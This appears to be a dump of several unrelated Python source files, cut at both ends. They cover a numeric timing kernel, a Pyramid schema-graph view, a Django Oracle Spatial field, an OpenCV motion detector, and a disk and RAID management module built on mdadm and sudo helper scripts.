return_numpy_array[448] = input_numpy_array[29] / math.sqrt(input_numpy_array[75])
return_numpy_array[449] = input_numpy_array[99] / math.sqrt(input_numpy_array[30])
return_numpy_array[450] = input_numpy_array[74] / math.sqrt(input_numpy_array[86])
return_numpy_array[451] = input_numpy_array[69] / math.sqrt(input_numpy_array[11])
return_numpy_array[452] = input_numpy_array[75] / math.sqrt(input_numpy_array[64])
return_numpy_array[453] = input_numpy_array[23] / math.sqrt(input_numpy_array[41])
return_numpy_array[454] = input_numpy_array[49] / math.sqrt(input_numpy_array[3])
return_numpy_array[455] = input_numpy_array[70] / math.sqrt(input_numpy_array[55])
return_numpy_array[456] = input_numpy_array[21] / math.sqrt(input_numpy_array[38])
return_numpy_array[457] = input_numpy_array[65] / math.sqrt(input_numpy_array[81])
return_numpy_array[458] = input_numpy_array[9] / math.sqrt(input_numpy_array[47])
return_numpy_array[459] = input_numpy_array[99] / math.sqrt(input_numpy_array[15])
return_numpy_array[460] = input_numpy_array[61] / math.sqrt(input_numpy_array[85])
return_numpy_array[461] = input_numpy_array[33] / math.sqrt(input_numpy_array[54])
return_numpy_array[462] = input_numpy_array[66] / math.sqrt(input_numpy_array[19])
return_numpy_array[463] = input_numpy_array[50] / math.sqrt(input_numpy_array[39])
return_numpy_array[464] = input_numpy_array[40] / math.sqrt(input_numpy_array[54])
return_numpy_array[465] = input_numpy_array[11] / math.sqrt(input_numpy_array[23])
return_numpy_array[466] = input_numpy_array[24] / math.sqrt(input_numpy_array[22])
return_numpy_array[467] = input_numpy_array[86] / math.sqrt(input_numpy_array[17])
return_numpy_array[468] = input_numpy_array[83] / math.sqrt(input_numpy_array[2])
return_numpy_array[469] = input_numpy_array[44] / math.sqrt(input_numpy_array[69])
return_numpy_array[470] = input_numpy_array[53] / math.sqrt(input_numpy_array[25])
return_numpy_array[471] = input_numpy_array[83] / math.sqrt(input_numpy_array[67])
return_numpy_array[472] = input_numpy_array[3] / math.sqrt(input_numpy_array[42])
return_numpy_array[473] = input_numpy_array[43] / math.sqrt(input_numpy_array[33])
return_numpy_array[474] = input_numpy_array[73] / math.sqrt(input_numpy_array[97])
return_numpy_array[475] = input_numpy_array[39] / math.sqrt(input_numpy_array[20])
return_numpy_array[476] = input_numpy_array[98] / math.sqrt(input_numpy_array[58])
return_numpy_array[477] = input_numpy_array[21] / math.sqrt(input_numpy_array[38])
return_numpy_array[478] = input_numpy_array[88] / math.sqrt(input_numpy_array[47])
return_numpy_array[479] = input_numpy_array[6] / math.sqrt(input_numpy_array[93])
return_numpy_array[480] = input_numpy_array[37] / math.sqrt(input_numpy_array[96])
return_numpy_array[481] = input_numpy_array[23] / math.sqrt(input_numpy_array[60])
return_numpy_array[482] = input_numpy_array[68] / math.sqrt(input_numpy_array[2])
return_numpy_array[483] = input_numpy_array[66] / math.sqrt(input_numpy_array[64])
return_numpy_array[484] = input_numpy_array[49] / math.sqrt(input_numpy_array[26])
return_numpy_array[485] = input_numpy_array[18] / math.sqrt(input_numpy_array[26])
return_numpy_array[486] = input_numpy_array[48] / math.sqrt(input_numpy_array[7])
return_numpy_array[487] = input_numpy_array[89] / math.sqrt(input_numpy_array[94])
return_numpy_array[488] = input_numpy_array[5] / math.sqrt(input_numpy_array[54])
return_numpy_array[489] = input_numpy_array[20] / math.sqrt(input_numpy_array[91])
return_numpy_array[490] = input_numpy_array[86] / math.sqrt(input_numpy_array[35])
return_numpy_array[491] = input_numpy_array[68] / math.sqrt(input_numpy_array[12])
return_numpy_array[492] = input_numpy_array[54] / math.sqrt(input_numpy_array[60])
return_numpy_array[493] = input_numpy_array[35] / math.sqrt(input_numpy_array[45])
return_numpy_array[494] = input_numpy_array[44] / math.sqrt(input_numpy_array[8])
return_numpy_array[495] = input_numpy_array[82] / math.sqrt(input_numpy_array[29])
return_numpy_array[496] = input_numpy_array[39] / math.sqrt(input_numpy_array[43])
return_numpy_array[497] = input_numpy_array[39] / math.sqrt(input_numpy_array[88])
return_numpy_array[498] = input_numpy_array[1] / math.sqrt(input_numpy_array[18])
return_numpy_array[499] = input_numpy_array[73] / math.sqrt(input_numpy_array[71])
return_numpy_array[500] = input_numpy_array[55] / math.sqrt(input_numpy_array[34])
return_numpy_array[501] = input_numpy_array[46] / math.sqrt(input_numpy_array[70])
return_numpy_array[502] = input_numpy_array[33] / math.sqrt(input_numpy_array[48])
return_numpy_array[503] = input_numpy_array[2] / math.sqrt(input_numpy_array[36])
return_numpy_array[504] = input_numpy_array[92] / math.sqrt(input_numpy_array[89])
return_numpy_array[505] = input_numpy_array[47] / math.sqrt(input_numpy_array[67])
return_numpy_array[506] = input_numpy_array[86] / math.sqrt(input_numpy_array[90])
return_numpy_array[507] = input_numpy_array[98] / math.sqrt(input_numpy_array[45])
return_numpy_array[508] = input_numpy_array[91] / math.sqrt(input_numpy_array[53])
return_numpy_array[509] = input_numpy_array[69] / math.sqrt(input_numpy_array[80])
return_numpy_array[510] = input_numpy_array[34] / math.sqrt(input_numpy_array[61])
return_numpy_array[511] = input_numpy_array[20] / math.sqrt(input_numpy_array[49])
return_numpy_array[512] = input_numpy_array[11] / math.sqrt(input_numpy_array[27])
return_numpy_array[513] = input_numpy_array[86] / math.sqrt(input_numpy_array[9])
return_numpy_array[514] = input_numpy_array[8] / math.sqrt(input_numpy_array[99])
return_numpy_array[515] = input_numpy_array[25] / math.sqrt(input_numpy_array[8])
return return_numpy_array
def main():
sample_row = numpy.ones(101, dtype=numpy.float64)
NUMITER = 10000
sample_row[10] = 5
sample_row[100] = 6
sample_row[11] = 8
# Force compilation.
process_row(sample_row)
process_row(sample_row)
start = timer()
for _ in range(NUMITER):
process_row(sample_row)
end = timer()
print((end - start) / NUMITER)
if __name__ == '__main__':
main()
|
1689517
|
from collections import defaultdict
from past.builtins import basestring
from pyramid.response import Response
from pyramid.view import view_config
from subprocess import Popen, PIPE
from xml.sax.saxutils import quoteattr, escape
from contentbase import TYPES
def includeme(config):
config.add_route('graph_dot', '/profiles/graph.dot')
config.add_route('graph_svg', '/profiles/graph.svg')
config.scan(__name__)
def node(item_type, props):
yield (
'{item_type} [shape=plaintext label=<\n'
' <table border="1" cellborder="0" cellspacing="0" align="left">\n'
' <tr><td PORT="uuid" border="1" sides="B" bgcolor="lavender" href="/profiles/{item_type}.json">{item_type}</td></tr>'
).format(item_type=item_type)
items = sorted(props.items())
for name, prop in items:
if name == 'uuid' or prop.get('calculatedProperty'):
continue
label = escape(name)
if 'items' in prop:
label += ' []'
prop = prop['items']
if 'linkTo' in prop:
label = '<b>' + label + '</b>'
yield ' <tr><td PORT={name}>{label}</td></tr>'.format(name=quoteattr(name), label=label)
yield ' </table>>];'
def edges(source, name, linkTo, exclude, subclasses):
if isinstance(linkTo, basestring):
if linkTo in subclasses:
linkTo = subclasses[linkTo]
else:
linkTo = [linkTo]
exclude = [source] + exclude
return [
'{source}:{name} -> {target}:uuid;'.format(source=source, name=quoteattr(name), target=target)
for target in linkTo if target not in exclude
]
def digraph(types, exclude=None):
if not exclude:
exclude = ['submitted_by', 'lab', 'award']
out = [
'digraph schema {',
'rankdir=LR',
]
subclasses = defaultdict(list)
for source, type_info in sorted(types.items()):
for base in type_info.base_types[:-1]:
subclasses[base].append(source)
for source, type_info in sorted(types.items()):
if type_info.schema is None:
continue
if source.startswith('testing_'):
continue
if source == 'antibody_approval':
continue
out.extend(node(source, type_info.schema['properties']))
for name, prop in type_info.schema['properties'].items():
if name in exclude or prop.get('calculatedProperty'):
continue
prop = prop.get('items', prop)
if 'linkTo' in prop:
out.extend(edges(source, name, prop['linkTo'], exclude, subclasses))
out.append('}')
return '\n'.join(out)
@view_config(route_name='graph_dot', request_method='GET')
def schema_dot(request):
dot = digraph(request.registry[TYPES].types, request.params.getall('exclude'))
return Response(dot, content_type='text/vnd.graphviz', charset='utf-8')
@view_config(route_name='graph_svg', request_method='GET')
def schema_svg(request):
dot = digraph(request.registry[TYPES].types, request.params.getall('exclude'))
p = Popen(['dot', '-Tsvg'], stdin=PIPE, stdout=PIPE, stderr=PIPE)
svg, err = p.communicate(dot.encode('utf-8'))
assert p.returncode == 0, err.decode('utf-8')
return Response(svg, content_type='image/svg+xml', charset='utf-8')
|
1689534
|
from django.db import connection
from django.db.backends.util import truncate_name
from django.db.models.fields import Field # Django base Field class
from django.contrib.gis.db.backend.util import gqn
from django.contrib.gis.db.backend.oracle.query import TRANSFORM
# Quotename & geographic quotename, respectively.
qn = connection.ops.quote_name
class OracleSpatialField(Field):
"""
The backend-specific geographic field for Oracle Spatial.
"""
empty_strings_allowed = False
def __init__(self, extent=(-180.0, -90.0, 180.0, 90.0), tolerance=0.05, **kwargs):
"""
Oracle Spatial backend needs to have the extent -- for projected coordinate
systems _you must define the extent manually_, since the coordinates are
for geodetic systems. The `tolerance` keyword specifies the tolerance
for error (in meters), and defaults to 0.05 (5 centimeters).
"""
# Oracle Spatial specific keyword arguments.
self._extent = extent
self._tolerance = tolerance
# Calling the Django field initialization.
super(OracleSpatialField, self).__init__(**kwargs)
def _add_geom(self, style, db_table):
"""
Adds this geometry column into the Oracle USER_SDO_GEOM_METADATA
table.
"""
# Checking the dimensions.
# TODO: Add support for 3D geometries.
if self._dim != 2:
raise Exception('3D geometries not yet supported on Oracle Spatial backend.')
# Constructing the SQL that will be used to insert information about
# the geometry column into the USER_GSDO_GEOM_METADATA table.
meta_sql = style.SQL_KEYWORD('INSERT INTO ') + \
style.SQL_TABLE('USER_SDO_GEOM_METADATA') + \
' (%s, %s, %s, %s)\n ' % tuple(map(qn, ['TABLE_NAME', 'COLUMN_NAME', 'DIMINFO', 'SRID'])) + \
style.SQL_KEYWORD(' VALUES ') + '(\n ' + \
style.SQL_TABLE(gqn(db_table)) + ',\n ' + \
style.SQL_FIELD(gqn(self.column)) + ',\n ' + \
style.SQL_KEYWORD("MDSYS.SDO_DIM_ARRAY") + '(\n ' + \
style.SQL_KEYWORD("MDSYS.SDO_DIM_ELEMENT") + \
("('LONG', %s, %s, %s),\n " % (self._extent[0], self._extent[2], self._tolerance)) + \
style.SQL_KEYWORD("MDSYS.SDO_DIM_ELEMENT") + \
("('LAT', %s, %s, %s)\n ),\n" % (self._extent[1], self._extent[3], self._tolerance)) + \
' %s\n );' % self._srid
return meta_sql
def _geom_index(self, style, db_table):
"Creates an Oracle Geometry index (R-tree) for this geometry field."
# Getting the index name, Oracle doesn't allow object
# names > 30 characters.
idx_name = truncate_name('%s_%s_id' % (db_table, self.column), 30)
sql = style.SQL_KEYWORD('CREATE INDEX ') + \
style.SQL_TABLE(qn(idx_name)) + \
style.SQL_KEYWORD(' ON ') + \
style.SQL_TABLE(qn(db_table)) + '(' + \
style.SQL_FIELD(qn(self.column)) + ') ' + \
style.SQL_KEYWORD('INDEXTYPE IS ') + \
style.SQL_TABLE('MDSYS.SPATIAL_INDEX') + ';'
return sql
def post_create_sql(self, style, db_table):
"""
Returns SQL that will be executed after the model has been
created.
"""
# Getting the meta geometry information.
post_sql = self._add_geom(style, db_table)
# Getting the geometric index for this Geometry column.
if self._index:
return (post_sql, self._geom_index(style, db_table))
else:
return (post_sql,)
def db_type(self):
"The Oracle geometric data type is MDSYS.SDO_GEOMETRY."
return 'MDSYS.SDO_GEOMETRY'
def get_placeholder(self, value):
"""
Provides a proper substitution value for Geometries that are not in the
SRID of the field. Specifically, this routine will substitute in the
SDO_CS.TRANSFORM() function call.
"""
if value is None:
return '%s'
elif value.srid != self._srid:
# Adding Transform() to the SQL placeholder.
return '%s(SDO_GEOMETRY(%%s, %s), %s)' % (TRANSFORM, value.srid, self._srid)
else:
return 'SDO_GEOMETRY(%%s, %s)' % self._srid
|
1689609
|
import cv2
import numpy as np
cap=cv2.VideoCapture('data/vtest.avi')
ret,frame1=cap.read()
ret,frame2=cap.read()
while cap.isOpened():
diff=cv2.absdiff(frame1,frame2)
gray=cv2.cvtColor(frame1,cv2.COLOR_BGR2GRAY)
blur=cv2.GaussianBlur(gray,(5,5),0)
_,thresh=cv2.threshold(blur,20,255,cv2.THRESH_BINARY)
dilated=cv2.dilate(thresh,None,iterations=3)
contours,_=cv2.findContours(dilated,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
cv2.drawContours(frame1,contours,-1,(255,0,0),2)
for i in contours:
(x,y,w,h)=cv2.boundingRect(i)
if cv2.contourArea(i)<10:
continue
cv2.rectangle(frame1,(x,y),(x+2*w,y+2*h),(0,255,0),2)
cv2.putText(frame1 ,"status: MOVEMENT",(10,20),cv2.FONT_HERSHEY_COMPLEX,1,(0,0,255) ,3)
cv2.imshow('frame',frame1)
frame1=frame2
ret,frame2=cap.read()
if cv2.waitKey(40)==27:
break
cv2.destroyAllWindows()
cap.release()
|
1689623
|
from collections import defaultdict
import fcntl
import io
import os
import re
import subprocess
import sys
import tempfile
from django.conf import settings
#from celery.utils import log as logging
import logging
log = logging.getLogger(__name__)
#log = logging.task_logger
__author__ = 'pflarr'
SUDO_CMDS = settings.SITE_ROOT/'core'/'bin'/'sudo'
ADD_SPARE_CMD = SUDO_CMDS/'mdadm_add_spare.sh'
CREATE_CMD = SUDO_CMDS/'mdadm_create.sh'
CREATE_INDEX_CMD = SUDO_CMDS/'mdadm_create_index.sh'
DESTROY_CMD = SUDO_CMDS/'mdadm_destroy.sh'
STOP_CMD = SUDO_CMDS/'mdadm_stop.sh'
REMOVE_SPARE_CMD = SUDO_CMDS/'mdadm_remove_spare.sh'
MKXFS_CMD = SUDO_CMDS/'mkfs.xfs.sh'
UDEV_TRIGGER_CMD = SUDO_CMDS/'udev_trigger.sh'
JBOD_LOCATE_CMD = SUDO_CMDS/'JBOD_locate'
BLKID_CMD = '/sbin/blkid'
# /sys/block does not contain block device partitions.
BLOCK_PATH = '/sys/class/block'
# Consider disks to be of similar size if they within this many bytes of size.
SIZE_VARIATION = 1024**3
class Device:
MD_TYPE = 'MD_RAID'
DISK_TYPE = 'DISK'
LVM_TYPE = 'LVM'
type = None
# All the devices that we currently know about.
_DEVICES = {}
# A dictionary on mount information by device.
_MOUNT_MAP = None
# A dictionary mapping device_name -> raid device object.
_RAID_MAP = {}
# Disks that host LVM devices
_LVM_SLAVES = {}
# Map of device_name -> (enclosure, slot)
_ENCLOSURE_MAP = {}
# A dictionary of each enclosures empty slots.
_EMPTY_SLOTS = defaultdict(lambda: set())
_SYS_BLK = '/sys/class/block'
# The attributes to return when asked for a json representation of this Device.
DICT_ATTRS = ['alias',
'dev_path',
'enclosure',
'fs',
'size_hr',
'label',
'locate',
'mountpoint',
'name',
'size',
'slot',
'state',
'slot_status',
'type',
'uuid']
def __init__(self, dev):
# The size for block devices is in 512 byte blocks
self.size = int(self.read(self._SYS_BLK, dev, 'size')) * 512
self.name = dev
# Some device types have other names
self.alias = dev
@property
def uuid(self):
# Get the filesystem's UUID using the blkid cmd.
blkid_cmd = [settings.SUDO_PATH, BLKID_CMD, '-o', 'value', '-s', 'UUID', self.dev_path]
blkid_proc = subprocess.Popen(blkid_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=False)
data = blkid_proc.stdout.read()
uuid = bytes(data.strip()).decode('utf8')
if uuid:
return uuid
else:
return None
@property
def dev_path(self):
"""
:return: The /dev path to this device.
"""
return os.path.join('/dev', self.name)
_STATE_CODES = {'in_sync': '',
'spare': '(S)',
'faulty': '(F)'}
@property
def enclosure(self):
"""The enclosure in which this device resides."""
return self._ENCLOSURE_MAP.get(self.name, {}).get('encl')
@property
def slot(self):
"""The enclosure slot of this device, if any."""
return self._ENCLOSURE_MAP.get(self.name, {}).get('slot')
@property
def locate(self):
return self._ENCLOSURE_MAP.get(self.name, {}).get('locate') == '1'
@locate.setter
def locate(self, value):
_set_locate(self, value)
self._ENCLOSURE_MAP[self.name]['locate'] = self.read('/sys/class/enclosure',
self.enclosure, self.slot,
'locate')
@classmethod
def locate_clear_all(cls):
if subprocess.call([settings.SUDO_PATH, JBOD_LOCATE_CMD, 'clear']) != 0:
raise RuntimeError("Could not clear locate flags.")
@property
def state(self):
"""A list of the known conditions for the device."""
state = []
if self.mountpoint is not None:
state.append('mounted')
if self.list_like(self._SYS_BLK, self.name, r'{}\d+$'):
# This device appears to have partitions
state.append('partitioned')
raid = self._RAID_MAP.get(self.name)
if raid is not None:
rdisk_state = raid.disks.get(self.name)
state.append('In RAID {} ({})'.format(raid.name, rdisk_state))
parts = self.list_like(self._SYS_BLK, self.name, self.name+'\d+$')
if parts:
state.append('partitioned')
swaps = self.read('/proc/swaps')
swaps = swaps.split('\n')[1:]
for line in swaps:
try:
dev = line.split()[0].split('/')[-1]
except IndexError:
continue
if dev == self.name:
state.append('swap')
if self.name in Device._LVM_SLAVES:
state.append('lvm_slave')
return state
@property
def slot_status(self):
if self.enclosure is None or self.slot is None:
return None
return self.read('/sys/class/enclosure', self.enclosure, self.slot, 'status')
@property
def raid(self):
return self._RAID_MAP.get(self.name)
@property
def size_hr(self):
"""
:return: A string of the human readible size for the device.
"""
units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB']
unit = units.pop(0)
size = self.size
while units and size > 1024:
size /= 1024.0
unit = units.pop(0)
return "{0:.2f} {1:s}".format(size, unit)
@property
def state_cs(self):
return ','.join(self.state)
@property
def mountpoint(self):
if self.name in self._MOUNT_MAP:
return self._MOUNT_MAP[self.name]['mountpoint']
elif self.type == Device.LVM_TYPE and self.alias in self._MOUNT_MAP:
return self._MOUNT_MAP[self.alias]['mountpoint']
else:
return None
@property
def fs(self):
if self.name in self._MOUNT_MAP:
return self._MOUNT_MAP[self.name]['fs']
elif self.type == Device.LVM_TYPE and self.alias in self._MOUNT_MAP:
return self._MOUNT_MAP[self.alias]['fs']
elif os.getuid() == 0:
# If we can't get the filesystem from the mount table, check with blkid.
blkid_cmd = [settings.SUDO_PATH, BLKID_CMD, '-o', 'value', '-s', 'TYPE',
'-p', self.dev_path]
blkid_proc = subprocess.Popen(blkid_cmd, stdout=subprocess.PIPE)
fs = bytes(blkid_proc.stdout.read().strip()).decode('utf8')
return fs if fs else None
return None
@property
def label(self):
blkid_cmd = [settings.SUDO_PATH, BLKID_CMD, '-o', 'value', '-s', 'LABEL', self.dev_path]
blkid_proc = subprocess.Popen(blkid_cmd, stdout=subprocess.PIPE)
label = blkid_proc.stdout.read().strip()
label = bytes(label).decode('utf8')
return label if label else None
@staticmethod
def read(*args):
try:
file_path = os.path.join(*args)
return open(file_path, 'rb').read().strip().decode('utf8')
except IOError:
return ''
@staticmethod
def list_like(*args):
# All but the last arg are path components, rooted at BLOCK_PATH
# The last arg is the fnmatch pattern
file_path = os.path.join(*args[:-1])
re_str = args[-1] + '$'
fn_re = re.compile(re_str)
if not os.path.exists(file_path):
return []
return [file for file in os.listdir(file_path) if fn_re.match(file) is not None]
@classmethod
def map_enclosures(cls):
"""
Map the enclosures listed in sysfs, and add that info to the given devices
:return: None
"""
cls._ENCLOSURE_MAP = {}
cls._EMPTY_SLOTS = defaultdict(lambda: set())
for encl in Device.list_like('/sys/class/enclosure', r'.+'):
for slot in Device.list_like('/sys/class/enclosure', encl, r'Slot \d+'):
disks = Device.list_like('/sys/class/enclosure', encl, slot, 'device', 'block',
r'sd\w+')
locate = Device.read('/sys/class/enclosure', encl, slot, 'locate')
status = Device.read('/sys/class/enclosure', encl, slot, 'status')
for disk in disks:
cls._ENCLOSURE_MAP[disk] = {'encl': encl,
'slot': slot,
'locate': locate,
'status': status}
if not disks:
cls._EMPTY_SLOTS[encl].add(slot)
def format_xfs(self, label=None):
"""Format this device with xfs.
:param label: The label to give the filesystem, if any.
"""
# Create xfs filesystem
err = tempfile.TemporaryFile()
mkfs_cmd = [settings.SUDO_PATH, MKXFS_CMD, self.dev_path]
if label is not None:
mkfs_cmd.append(label)
if subprocess.call(mkfs_cmd, stdout=err, stderr=err) != 0:
err.seek(0)
raise RuntimeError("Error formatting device {}: {}".format(self.name, err.read()))
COMPAT_RE = None
@classmethod
def is_compat(cls, dev):
"""Returns true if this class is compatible with the given device."""
return cls.COMPAT_RE.match(dev) is not None
@classmethod
def refresh(cls):
"""Refresh cached disk information. This only applies to mount and fs info, current."""
devices = set(os.listdir(BLOCK_PATH))
old_devices = set(cls._DEVICES.keys())
# Remove any devices that are no longer present.
for mdev in old_devices - devices:
del cls._DEVICES[mdev]
# Add any new devices
for dev in devices - old_devices:
if MDRaidDevice.is_compat(dev):
# This is an mdadm RAID.
cls._DEVICES[dev] = MDRaidDevice(dev)
elif DiskDevice.is_compat(dev):
# This is a regular serial device
cls._DEVICES[dev] = DiskDevice(dev)
elif LVMDevice.is_compat(dev):
cls._DEVICES[dev] = LVMDevice(dev)
else:
# We only consider the above device types.
continue
cls.map_enclosures()
# Make a dictionary of mounted disks -> (mount_point, filesystem).
mounts = {}
for line in open('/proc/mounts').readlines():
mdev, mountpoint, fs = line.split()[:3]
mdev = mdev.split('/')[-1]
mounts[mdev] = {'mountpoint': mountpoint, 'fs': fs}
Device._MOUNT_MAP = mounts
# Gather information from composite devices.
for dev in cls._DEVICES:
dev_ob = cls._DEVICES[dev]
if dev_ob.type == Device.MD_TYPE:
dev_ob.map_member_devices()
if dev_ob.type == Device.LVM_TYPE:
dev_ob.map_slaves()
cls._clean_raid_map()
@classmethod
def _clean_raid_map(cls):
"""Remove any entries in the RAID map for which their RAID no longer exists."""
for dev in list(cls._RAID_MAP.keys()):
raid = cls._RAID_MAP[dev]
if raid.name not in cls._DEVICES:
del cls._RAID_MAP[dev]
@classmethod
def get_devices(cls):
"""Get a dictionary of device_name -> Device_object that includes all disk devices
that we recognize on the system.
:rtype: dict[str, Device]
"""
cls.refresh()
return cls._DEVICES
@classmethod
def find_device_by_uuid(cls, uuid):
""" Find the device with the given UUID, and return a Device object (or child) for it.
:return: The device node identified by the given uuid, or None if not found.
"""
uuid = str(uuid)
cls.refresh()
# kludge 2018-01-11 neale
# Docker doesn't run udev, we needed a more universal way to find devices
dev_path_cmd = subprocess.Popen([BLKID_CMD, "-o", "device", "-t", "UUID=" + uuid], stdout=subprocess.PIPE)
stdout, stderr = dev_path_cmd.communicate()
dev_path = stdout.strip().decode('utf-8')
if not dev_path:
return None
dev_name = os.path.split(dev_path)[-1]
return cls._DEVICES.get(dev_name)
@classmethod
def get_empty_slots(cls):
"""Return a list of empty slot objects for each empty JBOD slot."""
cls.refresh()
empty_slots = []
for encl in cls._EMPTY_SLOTS:
for slot in cls._EMPTY_SLOTS[encl]:
empty_slots.append(EmptySlot(encl, slot))
return empty_slots
def as_dict(self):
d = {}
for attr in self.DICT_ATTRS:
val = getattr(self, attr)
if val is not None:
d[attr] = val
return d
def __getitem__(self, index):
attr = self.DICT_ATTRS[index]
return getattr(self, attr)
def __str__(self):
return "{}({})".format(self.type, self.dev_path)
def __repr(self):
return str(self)
class MDRaidDevice(Device):
"""An MDADM RAID device."""
type = Device.MD_TYPE
COMPAT_RE = re.compile(r'md\d+$')
DICT_ATTRS = Device.DICT_ATTRS + ['degraded',
'level',
'count',
'spares',
'array_state',
'rebuild_status']
def __init__(self, dev):
Device.__init__(self, dev)
self.degraded = False if self.read(self._SYS_BLK, dev, 'md', 'degraded') == '0' else True
self.level = self.read(self._SYS_BLK, dev, 'md', 'level')
count = self.read(self._SYS_BLK, dev, 'md', 'raid_disks')
self.count = int(count) if count else 0
self.disks = {}
self.spares = 0
@property
def array_state(self):
"""Grab the state value for the array from sys."""
return self.read('/sys/class/block', self.name, 'md', 'array_state')
def map_member_devices(self):
"""
Update our map of device -> RAID for those devices that are part of an
MDADM raid.
:return:
"""
new_map = {}
self.disks = {}
self.spares = 0
raid_disks = self.list_like(self._SYS_BLK, self.name, 'md', 'dev-\w+')
for disk in raid_disks:
rdisk_state = self.read(self._SYS_BLK, self.name, 'md', disk, 'state')
dev_name = disk.split('-', 1)[1]
new_map[dev_name] = self
self.disks[dev_name] = rdisk_state
if rdisk_state == 'spare':
self.spares += 1
Device._RAID_MAP.update(new_map)
for dev in list(Device._RAID_MAP.keys()):
raid = Device._RAID_MAP[dev]
if dev not in new_map and raid.name == self.name:
del Device._RAID_MAP[dev]
@property
def rebuild_status(self):
"""Read through /proc/mdstat and get the RAID rebuild status, if it exists."""
data = self.read('/proc/mdstat')
line = ''
lines = data.split('\n')
while lines:
line = lines.pop(0)
if line.startswith(self.name + ' '):
break
if lines:
line = lines.pop(0)
while lines and not line.startswith('md'):
line = line.strip()
if line.startswith('['):
return line
line = lines.pop(0)
return None
class LVMDevice(Device):
type = Device.LVM_TYPE
COMPAT_RE = re.compile(r'dm-\d+$')
def __init__(self, dev):
Device.__init__(self, dev)
self.alias = self.read(self._SYS_BLK, dev, 'dm', 'name')
def map_slaves(self):
my_old_slaves = {dev for dev, dep in self._LVM_SLAVES.items()
if dep.name == self.name}
my_slaves = {}
for dev in self.list_like(self._SYS_BLK, self.name, 'slaves', '.*$'):
my_slaves[dev] = self
Device._LVM_SLAVES.update(my_slaves)
for dev in my_old_slaves - set(my_slaves.keys()):
del Device._LVM_SLAVES[dev]
class DiskDevice(Device):
type = Device.DISK_TYPE
COMPAT_RE = re.compile(r'(?:(?:sd|xvd)[a-z]+|loop)\d*$')
def __init__(self, dev):
Device.__init__(self, dev)
class EmptySlot:
"""This class is for representing empty slots in enclosures."""
DICT_ATTRS = ['enclosure',
'slot',
'slot_status',
'locate']
def __init__(self, enclosure, slot):
self.enclosure = enclosure
self.slot = slot
read = Device.read
slot_status = Device.slot_status
@property
def locate(self):
return self.read('/sys/class/enclosure', self.enclosure, self.slot, 'locate') == '1'
@locate.setter
def locate(self, value):
_set_locate(self, value)
as_dict = Device.as_dict
class Lockfile:
LOCK_DIR = settings.SITE_ROOT/'var/spool/lock/'
def __init__(self, name):
self.name = name
self.lockfile = None
@property
def path(self):
return os.path.join(self.LOCK_DIR, self.name)
def lock(self):
if not os.path.exists(self.LOCK_DIR):
os.makedirs(self.LOCK_DIR)
self.lockfile = open(self.path, 'w')
if fcntl.lockf(self.lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB):
raise IOError("Could not obtain disk management lock.\nExiting.")
def unlock(self):
if self.lockfile:
fcntl.flock(self.lockfile, fcntl.LOCK_UN)
self.lockfile.close()
self.lockfile = None
def __enter__(self):
self.lock()
def __exit__(self, *args):
self.unlock()
def _set_locate(dev, value):
if value:
value = '1'
else:
value = '0'
with tempfile.TemporaryFile() as tmp:
if subprocess.call([settings.SUDO_PATH, JBOD_LOCATE_CMD,
dev.enclosure, dev.slot, value], stdout=tmp, stderr=tmp) != 0:
tmp.seek(0)
raise RuntimeError("Could not set locate flag for {}, {}: {}".format(
dev.enclosure, dev.slot, tmp.read()
))
def _next_md(devices):
"""
Find an available md device number to use.
:param devices: A dictionary of device names as returned by block_devices.
:return: An integer device number.
"""
md_devices = [disk for disk in devices.keys() if devices[disk].type == Device.MD_TYPE]
md_nums = [int(re.match('md(\d+)', md).groups()[0]) for md in md_devices]
md_num = 1
while md_num in md_nums:
md_num += 1
return md_num
def make_raid5(disks, trial_run=False):
"""Make a RAID 5 array from the given set of disks.
:param bool trial_run: Don't actually create the raid.
"""
with Lockfile('raid_lock'):
# Get our block device information.
bd = Device.get_devices()
if len(disks) < 4:
raise RuntimeError("You must specify at least four disks. {} given.".format(len(disks)))
# Only disks without a current state are eligible (a state
# implies they are being used for some purpose.
eligible = []
for dev in bd.keys():
if len(bd[dev].state) == 0 and bd[dev].type == Device.DISK_TYPE:
eligible.append(dev)
# Make sure all the disks requested are eligible to be added to the RAID.
for disk in disks:
if disk not in eligible:
raise RuntimeError('Disk {} not eligible for being added to a raid.')
md_num = _next_md(bd)
# Make the RAID
mdadm_cmd = [settings.SUDO_PATH, CREATE_CMD, '/dev/md{0:d}'.format(md_num),
str(len(disks)), str(5)]
for disk in disks:
mdadm_cmd.append(os.path.join('/dev', disk))
if trial_run:
return
proc = subprocess.Popen(mdadm_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Send a 'y' to the mdadm command in case it asks whether it should continue.
try:
outs, errs = proc.communicate(input=b"y\n", timeout=30)
except subprocess.TimeoutExpired:
raise RuntimeError("Command Timed Out: {}".format(mdadm_cmd))
if proc.poll() != 0:
raise RuntimeError("Command Failed: {}, {}".format(outs, errs))
def destroy_raid(dev_name, trial_run=False):
"""Destroy the RAID identified by the """
bd = Device.get_devices()
dev_ob = bd.get(dev_name)
if dev_ob is None:
raise RuntimeError("No such device: {}.".format(dev_name))
from apps.capture_node_api.models.capture import Disk
if dev_ob.mountpoint is not None:
Disk.umount_uuid(dev_ob.uuid)
raid_devs = [bd[dev].dev_path for dev in dev_ob.disks.keys()]
if not trial_run:
if subprocess.call([settings.SUDO_PATH, STOP_CMD, dev_ob.dev_path]) != 0:
raise RuntimeError("Could not stop raid {}.".format(dev_name))
if subprocess.call([settings.SUDO_PATH, DESTROY_CMD] + raid_devs) != 0:
raise RuntimeError("Could not destroy devices {}.".format(raid_devs))
def init_capture_device(devices, status_file=None, trial_run=False, task=None):
"""Initialize the given device for capture. This involves:
- Formatting the disk with XFS.
- Registering the disk with the database.
- Mounting the disk.
- Preallocating BUCKET_SIZE files to fill the disk.
- Registering those buckets with the database.
:param str dev: The device to initialize as a capture disk.
:param file status_file: A file like object where status updates should be written. Turned
off by default.
:param bool trial_run: Prepare the action, but don't do anything.
:param task: A celery task for giving progress updates.
"""
dev = devices[0]
from apps.capture_node_api.models.capture import Disk
with Lockfile('init_lock'):
if status_file:
print("Initializing {}. This may take a while.".format(dev), file=status_file)
bd = Device.get_devices()
if dev not in bd.keys():
raise RuntimeError("Unknown device: {}".format(dev))
dev_ob = bd[dev]
if dev_ob.state:
# If this device has a state, then it's not eligble to be a capture device.
